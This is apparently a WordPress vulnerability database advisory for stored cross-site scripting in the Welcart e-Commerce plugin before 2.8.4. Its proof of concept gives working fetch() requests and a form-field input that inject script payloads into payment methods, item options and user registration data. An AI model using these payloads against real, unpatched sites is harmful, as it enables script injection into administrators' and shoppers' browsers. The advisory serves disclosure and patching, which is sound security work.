WordPress Plugin Vulnerabilities
Welcart e-Commerce < 2.8.4 - Multiple Subscriber+ Stored Cross-Site Scripting
Description
The plugin does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks
Proof of Concept
add new payment method with XSS exploit: fetch('http://localhost/tester-wp/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=payment_ajax&newname=XSS+Payment&newexplanation=<script>alert("XSS")</script>&newsettlement=acting&newmodule=payment_module' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); The exploit requires at least a subscriber role. The alert script displayed on the 3. Shipping and Payment tab on the shopping cart page. Cart URL: http://localhost/usces-cart/ --- add item option with XSS exploit: fetch('http://localhost/tester-wp/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=item_option_ajax&ID=100&update=1&optname=radio_button&optvalue=%3Cscript%3Ealert(%22radio+button+option+XSS%22)%3C%2Fscript%3E&optmeans=1&optessential=1&sort=0&optmetaid=1' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); If we want to add it as a common option, the ID will be the Cart page id (#100 cart page id). This post id is public data. Then, if the admin selects the option from the list in the "options for items" metabox when editing the product, the script will run. --- User registration is XSS vulnerable. Add a product to the cart, then go to the cart: http://localhost/usces-cart/ Enter the following code for the city: "><script>alert(1)</script> The edit fields are escaped on the admin (for example on user edit page, or order edit page), so the alert script is not displayed. However, if the admin makes changes to the user, the script is added to the log, and the output from the log no longer the escaped, so the alert script runs. In this case, an admin reaction to the XSS exploit is required.
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-11-21 (about 1 years ago)
Added
2022-11-21 (about 1 years ago)
Last Updated
2022-11-21 (about 1 years ago)